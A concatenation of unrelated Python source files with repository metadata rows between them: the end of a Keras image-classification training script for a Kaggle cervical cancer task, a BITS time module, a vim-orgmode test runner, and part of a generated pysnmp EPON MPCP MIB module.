def readDataImagesCls(pidx, wdir=None, maxNum=None):
if wdir is None:
wdir = os.path.dirname(pidx)
tdata = pd.read_csv(pidx)
if maxNum is not None:
numData = len(tdata)
if maxNum>numData:
maxNum = numData
tdata = tdata[:maxNum]
#
dataY = tdata['type'].as_matrix() - 1
tnumCls = len(np.unique(dataY))
dataY = np_utils.to_categorical(dataY, tnumCls)
lstpath = tdata['path'].as_matrix()
lstpath = [os.path.join(wdir, xx) for xx in lstpath]
dataPaths = lstpath
numPath = len(lstpath)
dataX = None
print (':: read images into memory...')
for ipath, path in enumerate(lstpath):
timg = skio.imread(path)
if dataX is None:
dataX = np.zeros([numPath] + list(timg.shape), dtype=np.uint8)
if (ipath%20)==0:
print ('\t[{0}/{1}]'.format(ipath, numPath))
dataX[ipath] = timg
return dataX, dataY, dataPaths
#####################################################
def getRandomInRange(vrange, pnum=None):
vmin,vmax = vrange
if pnum is None:
trnd = np.random.rand()
else:
trnd = np.random.rand(pnum)
ret = vmin + (vmax-vmin)*trnd
return ret
def preprocImgForInference(pimg, pinfo, angleRange=(-16.,+16.), batchSize = 16, imsize=256, isRandomize=False):
sizeCrop = (imsize, imsize)
dataX = np.zeros((batchSize, imsize, imsize, 3))
timg = pimg[:, :, :3]
CNT_chn_rc = pinfo['cnt_chn']
PTS_chn_rc = pinfo['rc_chn']
R_chn = pinfo['r_chn_good']
R_crv = pinfo['r_crv']
for ii in range(batchSize):
# R_crop = R_crv
if R_chn < 10:
R_chn = 10.
if isRandomize:
R_crop = getRandomInRange([0.6 * R_crv, 1.2 * R_crv])
else:
R_crop = R_crv
if PTS_chn_rc.shape[0]>0:
rndChnPos = np.random.randint(PTS_chn_rc.shape[0])
P_Center_XY = PTS_chn_rc[rndChnPos][::-1]
else:
P_Center_XY = CNT_chn_rc
#
if isRandomize:
angleCrop = getRandomInRange(angleRange)
else:
angleCrop = 0.
scaleCrop2 = (float(imsize) / (2. * R_crop + 2.))
#
timgCrop = buildImageWithRotScaleAroundCenter(timg, P_Center_XY, angleCrop, scaleCrop2, sizeCrop, isDebug=False)
timgCrop = (timgCrop.astype(np.float) / 127.5 - 1.0)
dataX[ii] = timgCrop
return dataX
#####################################################
def train_generator_CHANNEL_CLS(dataImg, dataCls, dataImgInfo, batchSize=64, imsize = 256,
isRandomize=True,
angleRange=(-16.,+16.),
scaleRange=(1.0, 1.0), fun_random_val=None):
numImg = dataImg.shape[0]
sizeCrop = (imsize, imsize)
imgIdx = list(range(numImg))
while True:
# rndIdx = np.random.permutation(imgIdx)[:batchSize]
rndIdx = np.random.randint(0,numImg, batchSize)
dataX = np.zeros((batchSize, imsize, imsize, 3))
dataY = np.zeros((batchSize, dataCls.shape[-1]))
# dataImgG = dataImg[rndIdx]
rndShiftMean = 0.2*getRandomInRange((-1., 1.0), pnum=batchSize)
rndShiftStd = 1.0 + 0.2 * getRandomInRange((-1.0, 1.0), pnum=batchSize)
#
for ii, idx in enumerate(rndIdx):
# timg = dataImgG[ii][:,:,:3]
timg = dataImg[idx][:, :, :3]
tinf = dataImgInfo[idx]
CNT_chn_rc = tinf['cnt_chn']
PTS_chn_rc = tinf['rc_chn']
R_chn = tinf['r_chn_good']
R_crv = tinf['r_crv']
# R_crop = R_crv
if R_chn<10:
R_chn = 10.
R_crop = getRandomInRange([0.6*R_crv, 1.2*R_crv])
# R_crop = R_chn * 3.
# ----
# if R_chn<10:
# R_chn = 10.
# K_chn2crv = float(R_chn)/float(R_crv)
# K_max = 3.
# if K_chn2crv>K_max:
# R_crop = R_chn * K_max
# ----
rndChnPos = np.random.randint(PTS_chn_rc.shape[0])
P_Center_XY = PTS_chn_rc[rndChnPos][::-1]
#
if isRandomize:
angleCrop = getRandomInRange(angleRange)
scaleCrop = getRandomInRange(scaleRange)
else:
angleCrop = 0.
scaleCrop = 1.
scaleCrop2 = scaleCrop * (float(imsize)/(2.*R_crop + 2.))
#
timgCrop = buildImageWithRotScaleAroundCenter(timg, P_Center_XY, angleCrop, scaleCrop2, sizeCrop, isDebug=False)
if fun_random_val is not None:
timgCrop = fun_random_val(timgCrop)
timgCrop = (timgCrop.astype(np.float)/127.5 - 1.0)
if isRandomize:
timgCrop -= rndShiftMean[ii]
timgCrop *= rndShiftStd[ii]
dataX[ii] = timgCrop
dataY[ii] = dataCls[idx]
yield (dataX, dataY)
#####################################################
if __name__ == '__main__':
# (1) Setup Tran/Validation data
fidxTrn = '/home/ar/@Kaggle/01_Intel_&_MobileODT_Cervical_Cancer_Screening/data/train-x512-processed-stage2/01-data-512x512/idx.txt-train.txt'
fidxVal = '/home/ar/@Kaggle/01_Intel_&_MobileODT_Cervical_Cancer_Screening/data/train-x512-processed-stage2/01-data-512x512/idx.txt-val.txt'
wdir = os.path.dirname(fidxTrn)
# (2) Input/Output models
pathModelValLoss = '{0}/model_CNN_Classification_valLoss_v1.h5'.format(wdir)
pathModelValAcc = '{0}/model_CNN_Classification_valAcc_v1.h5'.format(wdir)
pathModelLatest = '{0}/model_CNN_Classification_Latest_v1.h5'.format(wdir)
pathLog = '%s-log.csv' % pathModelValLoss
# (3) Continue training from checkpoint Model (if exists)
pathModelRestart = pathModelValLoss
if not os.path.isfile(pathModelRestart):
print (':: Trained model not found: build new model...')
model = buildModelCNN_Classification(numConv=1, ppadding='same', numHidden=128)
model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
else:
print ('!!! WARNING !!! Found trained model, loading... [{0}]'.format(pathModelRestart))
pref = time.strftime('%Y.%m.%d-%H.%M.%S')
pathModelValBk = '%s-%s.bk' % (pathModelValLoss, pref)
pathModelValAccBk = '%s-%s.bk' % (pathModelValAcc, pref)
pathModelLatestBk = '%s-%s.bk' % (pathModelLatest, pref)
shutil.copy(pathModelValLoss, pathModelValBk)
shutil.copy(pathModelValAcc, pathModelValAccBk)
# shutil.copy(pathModelLatest, pathModelLatestBk)
model = keras.models.load_model(pathModelRestart)
model.summary()
# (4) Preload data
trnX, trnY, _ = readDataImagesCls(fidxTrn)
valX, valY, _ = readDataImagesCls(fidxVal) #, maxNum=10)
# trnX, trnY = valX, valY
trnInfo = buildImgInfoList(trnX)
valInfo = buildImgInfoList(valX)
# (5) prepare image generator
numTrn = trnX.shape[0]
numVal = valX.shape[0]
imgSize = 256
batchSize = 64
numEpochs = 1000
numIterPerEpochTrn = 2 * numTrn / batchSize
numIterPerEpochVal = 1 * numVal / batchSize
if numIterPerEpochTrn<1:
numIterPerEpochTrn = 1
generatorTrn = train_generator_CHANNEL_CLS(dataImg=trnX, dataCls=trnY, dataImgInfo=trnInfo,
batchSize=batchSize,
isRandomize=True,
fun_random_val=None,
# fun_random_val=preproc_image
)
generatorVal = train_generator_CHANNEL_CLS(dataImg=valX, dataCls=valY, dataImgInfo=valInfo,
batchSize=1024,
# batchSize=batchSize,
isRandomize=False, fun_random_val=None)
# (6) Generate fixed validation data
valX_ext, valY_ext = next(generatorVal)
# (7) Train model
model.fit_generator(
generator=generatorTrn,
steps_per_epoch=numIterPerEpochTrn,
epochs=numEpochs,
validation_data=(valX_ext, valY_ext),
# validation_data=generatorVal,
# validation_steps=numIterPerEpochVal,
callbacks=[
kall.ModelCheckpoint(pathModelValLoss, verbose=True, save_best_only=True, monitor='val_loss'),
kall.ModelCheckpoint(pathModelValAcc, verbose=True, save_best_only=True, monitor='val_acc'),
# kall.ModelCheckpoint(pathModelLatest, verbose=True, save_best_only=False),
kall.CSVLogger(pathLog, append=True)
])
| 41.871212
| 146
| 0.581147
|
ee9fbf910165fc49a236a2cc60bbbd03db9bffc1
| 3,321
|
py
|
Python
|
python/time.py
|
3mdeb/bits
|
19da7046a7303f1de8b53165eea1a6f486757c03
|
[
"BSD-3-Clause"
] | 215
|
2015-08-05T07:31:35.000Z
|
2022-03-25T17:34:54.000Z
|
python/time.py
|
marcol3786/bits
|
19da7046a7303f1de8b53165eea1a6f486757c03
|
[
"BSD-3-Clause"
] | 12
|
2015-09-07T14:09:53.000Z
|
2021-04-07T05:03:26.000Z
|
python/time.py
|
marcol3786/bits
|
19da7046a7303f1de8b53165eea1a6f486757c03
|
[
"BSD-3-Clause"
] | 71
|
2015-08-05T02:35:13.000Z
|
2022-02-11T21:16:39.000Z
|
# Copyright (c) 2011, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""time module."""
import _bits
from collections import namedtuple
struct_time = namedtuple('struct_time', ['tm_year', 'tm_mon', 'tm_mday',
'tm_hour', 'tm_min', 'tm_sec',
'tm_wday', 'tm_yday', 'tm_isdst'])
#accept2dyear
#altzone
#asctime
#clock
#ctime
#daylight
def localtime(seconds = None):
"""
localtime([seconds]) -> (tm_year,tm_mon,tm_mday,tm_hour,tm_min,
tm_sec,tm_wday,tm_yday,tm_isdst)
Convert seconds since the Epoch to a time tuple expressing local time.
When 'seconds' is not passed in, convert the current time instead.
"""
if seconds is not None:
loctime = struct_time(*_bits._localtime(seconds))
else:
loctime = struct_time(*_bits._localtime())
if (loctime.tm_year % 400) == 0:
leap_year = 1
elif (loctime.tm_year % 100) == 0:
leap_year = 0
elif (loctime.tm_year % 4) == 0:
leap_year = 1
else:
leap_year = 0
ordinaldate = sum([31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31][0:loctime.tm_mon-1]) + loctime.tm_mday + leap_year
return loctime._replace(tm_yday = ordinaldate)
# Support gmtime for compatibility with callers. Timezones intentionally
# ignored; always assumes localtime matches UTC.
gmtime = localtime
#mktime
def sleep(seconds):
"""sleep(seconds)
Delay execution for a given number of seconds. The argument may be
a floating point number for subsecond precision."""
if seconds < 0:
raise ValueError("seconds must not be negative")
start = time()
while time() - start < seconds:
pass
#strftime
#strptime
#struct_time
time = _bits._time
#timezone
#tzname
#tzset
| 34.59375
| 121
| 0.696477
|
baa149ccc47be68301164ce436ac3fbcd809f2e0
| 1,523
|
py
|
Python
|
bundle/vim-orgmode/tests/run_tests.py
|
ninegrid/dotfiles-vim
|
4604f8a2e114cb2e98d5d79f2f41048c4f564b02
|
[
"Unlicense"
] | null | null | null |
bundle/vim-orgmode/tests/run_tests.py
|
ninegrid/dotfiles-vim
|
4604f8a2e114cb2e98d5d79f2f41048c4f564b02
|
[
"Unlicense"
] | null | null | null |
bundle/vim-orgmode/tests/run_tests.py
|
ninegrid/dotfiles-vim
|
4604f8a2e114cb2e98d5d79f2f41048c4f564b02
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import test_vimbuffer
import test_libagendafilter
import test_libcheckbox
import test_libbase
import test_libheading
import test_liborgdate
import test_liborgdate_parsing
import test_liborgdatetime
import test_liborgtimerange
import test_plugin_date
import test_plugin_edit_structure
import test_plugin_edit_checkbox
import test_plugin_misc
import test_plugin_navigator
import test_plugin_show_hide
import test_plugin_tags_properties
import test_plugin_todo
import test_plugin_mappings
import unittest
if __name__ == '__main__':
tests = unittest.TestSuite()
tests.addTests(test_vimbuffer.suite())
# lib
tests.addTests(test_libbase.suite())
tests.addTests(test_libcheckbox.suite())
tests.addTests(test_libagendafilter.suite())
tests.addTests(test_libheading.suite())
tests.addTests(test_liborgdate.suite())
tests.addTests(test_liborgdate_parsing.suite())
tests.addTests(test_liborgdatetime.suite())
tests.addTests(test_liborgtimerange.suite())
# plugins
tests.addTests(test_plugin_date.suite())
tests.addTests(test_plugin_edit_structure.suite())
tests.addTests(test_plugin_edit_checkbox.suite())
tests.addTests(test_plugin_misc.suite())
tests.addTests(test_plugin_navigator.suite())
tests.addTests(test_plugin_show_hide.suite())
tests.addTests(test_plugin_tags_properties.suite())
tests.addTests(test_plugin_todo.suite())
tests.addTests(test_plugin_mappings.suite())
runner = unittest.TextTestRunner()
runner.run(tests)
# vim: set noexpandtab:
| 26.258621
| 52
| 0.829941
|
f3c2b79084395356f9c28fa931aad64fb389a6ea
| 58,208
|
py
|
Python
|
pysnmp-with-texts/A3COM-HUAWEI-DOT3-EFM-EPON-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/A3COM-HUAWEI-DOT3-EFM-EPON-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/A3COM-HUAWEI-DOT3-EFM-EPON-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module A3COM-HUAWEI-DOT3-EFM-EPON-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/A3COM-HUAWEI-DOT3-EFM-EPON-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:04:35 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
h3cEpon, = mibBuilder.importSymbols("A3COM-HUAWEI-OID-MIB", "h3cEpon")
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
ObjectGroup, NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "NotificationGroup", "ModuleCompliance")
iso, Integer32, Counter64, ModuleIdentity, MibIdentifier, ObjectIdentity, Bits, Gauge32, TimeTicks, Unsigned32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, IpAddress, mib_2, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "Integer32", "Counter64", "ModuleIdentity", "MibIdentifier", "ObjectIdentity", "Bits", "Gauge32", "TimeTicks", "Unsigned32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "IpAddress", "mib-2", "NotificationType")
TruthValue, TextualConvention, MacAddress, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "MacAddress", "DisplayString")
h3cDot3EfmeponMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2))
h3cDot3EfmeponMIB.setRevisions(('2004-09-21 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setRevisionsDescriptions(('Initial version, published as RFC XXXX.',))
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setLastUpdated('200409210000Z')
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setOrganization('IETF Ethernet Interfaces and Hub MIB Working Group')
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setContactInfo('WG charter: http://www.ietf.org/html.charters/hubmib-charter.html Mailing Lists: General Discussion: hubmib@ietf.org To Subscribe: hubmib-request@ietf.org In Body: subscribe your_email_address Chair: Dan Romascanu Postal: Avaya Inc. Atidim Technology Park, Bldg. 3 Tel Aviv 61131 Israel Tel: +972-3-645-8414 E-mail: dromasca@avaya.com Editor: Lior Khermosh Postal: Passave Technologies Inc. Ackerstein Towers, Tower A, 6th floor, 9 Hamenofim St. Hertzliya Pituach 46725, ISRAEL P.O.Box 2089 Hertzliya Pituach 46120 Israel Tel: +972-9-9717600 Ext: 7181 E-mail: lior.khermosh@passave.com')
if mibBuilder.loadTexts: h3cDot3EfmeponMIB.setDescription("The objects in this MIB module are used to manage the Ethernet in the First Mile (EFM) Multi Point Control Protocol (MPCP) Interfaces as defined in IEEE Draft P802.3ah/D3.0 clause 64,65. The following reference is used throughout this MIB module: [802.3ah] refers to: IEEE Draft P802.3ah/D3.3: 'Draft amendment to - Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 3: Carrier sense multiple access with collision detection (CSMA/CD) access method and physical layer specifications - Media Access Control Parameters, Physical Layers and Management Parameters for subscriber access networks', 22 April 2004. Of particular interest are Clause 64(MPCP) 65(P2MP RS) and 60 (PON PMDs). Clause 30, 'Management', and Clause 45, 'Management Data Input/Output (MDIO) Interface'. Copyright (C) The Internet Society (2004). This version of this MIB module is part of XXXX see the RFC itself for full legal notices.")
h3cDot3MpcpMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1))
h3cDot3MpcpObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1))
h3cDot3MpcpConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2))
h3cDot3MpcpTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1), )
if mibBuilder.loadTexts: h3cDot3MpcpTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTable.setDescription('Table for dot3 Multi-Point Control Protocol (MPCP) MIB modules.')
h3cDot3MpcpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3MpcpEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpEntry.setDescription('An entry in the dot3 MPCP MIB modules table.')
h3cDot3MpcpID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpID.setReference('[802.3ah], 30.3.5.1.1.')
if mibBuilder.loadTexts: h3cDot3MpcpID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpID.setDescription('This variable is assigned so as to uniquely identify the Multi-Point MAC Control (MPCP) entity, as defined in [802.3ah] clause 64, among the subordinate managed objects of the containing object. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpOperStatus.setReference('[802.3ah], 30.3.5.1.2.')
if mibBuilder.loadTexts: h3cDot3MpcpOperStatus.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpOperStatus.setDescription('This variable can be used to define the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. Selecting admin for an interface with Multi-Point MAC Control sublayer. When the attribute is True the the interface will act as if Multi-point control protocol is enabled. When the attribute is False the interface will act as if it does not have the Multi-point control protocol. The operational state can be changed using the h3cDot3MpcpAdminState attribute. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpMode = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("olt", 1), ("onu", 2))).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cDot3MpcpMode.setReference('[802.3ah], 30.3.5.1.3.')
if mibBuilder.loadTexts: h3cDot3MpcpMode.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMode.setDescription('This variable can be used to identify the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. Selecting olt(1) for an OLT (server) mode and onu(2) for an ONU (client) mode. Writing can be done during only during initialization, when h3cDot3MpcpOperStatus indicates Flase. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpLinkID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpLinkID.setReference('[802.3ah], 30.3.5.1.4.')
if mibBuilder.loadTexts: h3cDot3MpcpLinkID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpLinkID.setDescription('A read-only value that identifies the Logical Link identity (LLID) associated with the MAC port as specified in [802.3ah] clause 65.1.3.2.2. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpRemoteMACAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 5), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRemoteMACAddress.setReference('[802.3ah], 30.3.5.1.5.')
if mibBuilder.loadTexts: h3cDot3MpcpRemoteMACAddress.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRemoteMACAddress.setDescription('A read-only value that identifies the source_address parameter of the last MPCPDUs passed to the MAC Control. This value is updated on reception of a valid frame with (1) a destination Field equal to the reserved multicast address for MAC Control specified in [802.3ah] Annex 31A, (2) lengthOrType field value equal to the reserved Type for MAC Control as specified in [802.3ah] Annex 31A. (3) an MPCP subtype value equal to the subtype reserved for MPCP as specified in [802.3ah] Annex 31A. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpRegistrationState = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unregistered", 1), ("registering", 2), ("registered", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRegistrationState.setReference('[802.3ah], 30.3.5.1.6.')
if mibBuilder.loadTexts: h3cDot3MpcpRegistrationState.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRegistrationState.setDescription('A read-only value that identifies the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. When this attribute has the enumeration unregistered(1) the interface may be used for registering a link partner. When this attribute has the enumeration registering(2) the interface is in the process of registering a link-partner. When this attribute has the enumeration registered(3) the interface has an established link-partner. This attribute is relevant for an OLT and an ONU. For the OLT it provides an indication per LLID.')
h3cDot3MpcpTransmitElapsed = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 7), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTransmitElapsed.setReference('[802.3ah], 30.3.5.1.19.')
if mibBuilder.loadTexts: h3cDot3MpcpTransmitElapsed.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTransmitElapsed.setDescription('A read-only value that reports the interval from last MPCP frame transmission in increments of Time Quanta (TQ) 16ns. The value returned shall be (interval from last MPCP frame transmission in ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpReceiveElapsed = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 8), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpReceiveElapsed.setReference('[802.3ah], 30.3.5.1.20.')
if mibBuilder.loadTexts: h3cDot3MpcpReceiveElapsed.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpReceiveElapsed.setDescription('A read-only value that reports the interval from last MPCP frame reception in increments of Time Quanta (TQ) 16ns. The value returned shall be (interval from last MPCP last MPCP frame reception in ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpRoundTripTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 9), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRoundTripTime.setReference('[802.3ah], 30.3.5.1.21.')
if mibBuilder.loadTexts: h3cDot3MpcpRoundTripTime.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRoundTripTime.setDescription('A read-only value that reports the MPCP round trip time in increments of Time Quanta (TQ) 16ns. The value returned shall be (round trip time in ns)/16. If this value exceeds (2^16-1) the value (2^16-1) shall be returned. This attribute is relevant for an OLT and an ONU. For the OLT there is a value per LLID')
h3cDot3MpcpMaximumPendingGrants = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpMaximumPendingGrants.setReference('[802.3ah], 30.3.5.1.24.')
if mibBuilder.loadTexts: h3cDot3MpcpMaximumPendingGrants.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMaximumPendingGrants.setDescription('A read-only value that indicates the maximum number of grants an ONU can store. The maximum number of grants an ONU can store has a range of 0 to 255. This attribute is relevant for an OLT and an ONU. For the OLT there is a value per LLID')
h3cDot3MpcpAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 11), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cDot3MpcpAdminState.setReference('[802.3ah], 30.3.5.2.1.')
if mibBuilder.loadTexts: h3cDot3MpcpAdminState.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpAdminState.setDescription('This variable can be used to define the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. Selecting admin for an interface with Multi-Point MAC Control sublayer. When selecting the value as True the interface Multi-Point control protocol is enabled. When selecting the value as False the interface acts as if the Multi-point Control protocol does not exist. Reading reflects the state of the attribute and the operation of the Multi-point control protocol mode of the interface. Writing can be done all the time. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpOnTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 12), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpOnTime.setReference('[802.3ah], 64.3.5.1.')
if mibBuilder.loadTexts: h3cDot3MpcpOnTime.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpOnTime.setDescription('A read-only value that reports the -on time- for a grant burst in increments of Time Quanta (TQ) 16ns as defined in [802.3ah] 60,64. The value returned shall be (on time ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpOffTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 13), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpOffTime.setReference('[802.3ah], 64.3.5.1.')
if mibBuilder.loadTexts: h3cDot3MpcpOffTime.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpOffTime.setDescription('A read-only value that reports the -off time- for a grant burst in increments of Time Quanta (TQ) 16ns as defined in [802.3ah] 60,64. The value returned shall be (off time ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpSyncTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 14), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpSyncTime.setReference('[802.3ah], 64.3.3.2.')
if mibBuilder.loadTexts: h3cDot3MpcpSyncTime.setStatus('current')
